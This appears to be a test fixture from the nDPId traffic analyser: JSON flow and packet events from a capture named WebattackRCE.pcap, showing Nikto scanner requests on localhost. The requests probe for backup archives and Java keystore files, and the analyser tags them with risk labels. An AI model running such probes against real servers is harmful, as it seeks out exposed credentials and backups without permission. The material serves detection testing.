00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1576420277046,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277046,"pkt":"AAAAAAAAAAAAAAAACABFAADBTDZAAEAG7\/5\/AAABfwAAAcNuH5C8OnRaQfn7gYAYAED+tQAAAQEICp1m\/F6dZvxeR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1576420277048,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277048,"pkt":"AAAAAAAAAAAAAAAACABFAADBa4BAAEAG0LR\/AAABfwAAAcNwH5C2s1MRi3VVO4AYAED+tQAAAQEICp1m\/GCdZvxfR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1576420277049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277049,"pkt":"AAAAAAAAAAAAAAAACABFAADEjgBAAEAGrjF\/AAABfwAAAcNyH5D9QLWRKHRYjoAYAED+uAAAAQEICp1m\/GGdZvxhR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1576420277050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277050,"pkt":"AAAAAAAAAAAAAAAACABFAADEqilAAEAGkgh\/AAABfwAAAcN0H5AfdZJKMNG2kYAYAED+uAAAAQEICp1m\/GKdZvxiR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1576420277051,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277051,"pkt":"AAAAAAAAAAAAAAAACABFAADFD2RAAEAGLM1\/AAABfwAAAcN2H5CQvDcOP8imdIAYAED+uQAAAQEICp1m\/GOdZvxjR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1576420277054,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277054,"pkt":"AAAAAAAAAAAAAAAACABFAADFMyBAAEAGCRF\/AAABfwAAAcN4H5CwJQty\/UTYeoAYAED+uQAAAQEICp1m\/GadZvxmR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1576420277055,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277055,"pkt":"AAAAAAAAAAAAAAAACABFAADBVOZAAEAG505\/AAABfwAAAcN6H5D0fGyVu01Ol4AYAED+tQAAAQEICp1m\/GedZvxnR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1576420277057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277057,"pkt":"AAAAAAAAAAAAAAAACABFAADBgcdAAEAGum1\/AAABfwAAAcN8H5AHG7m2UJwwhYAYAED+tQAAAQEICp1m\/GmdZvxpR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1576420277058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277058,"pkt":"AAAAAAAAAAAAAAAACABFAADB8E5AAEAGS+Z\/AAABfwAAAcN+H5BxG8g961ERj4AYAED+tQAAAQEICp1m\/GqdZvxqR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1576420277060,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277060,"pkt":"AAAAAAAAAAAAAAAACABFAADB8w9AAEAGSSV\/AAABfwAAAcOAH5AJpMt9MSZkIYAYAED+tQAAAQEICp1m\/GydZvxsR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1576420277061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277061,"pkt":"AAAAAAAAAAAAAAAACABFAADDv8dAAEAGfGt\/AAABfwAAAcOCH5BIh4e15F5tqYAYAED+twAAAQEICp1m\/G2dZvxtR0VUIC8xMjcuMC4wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277061,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277063,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
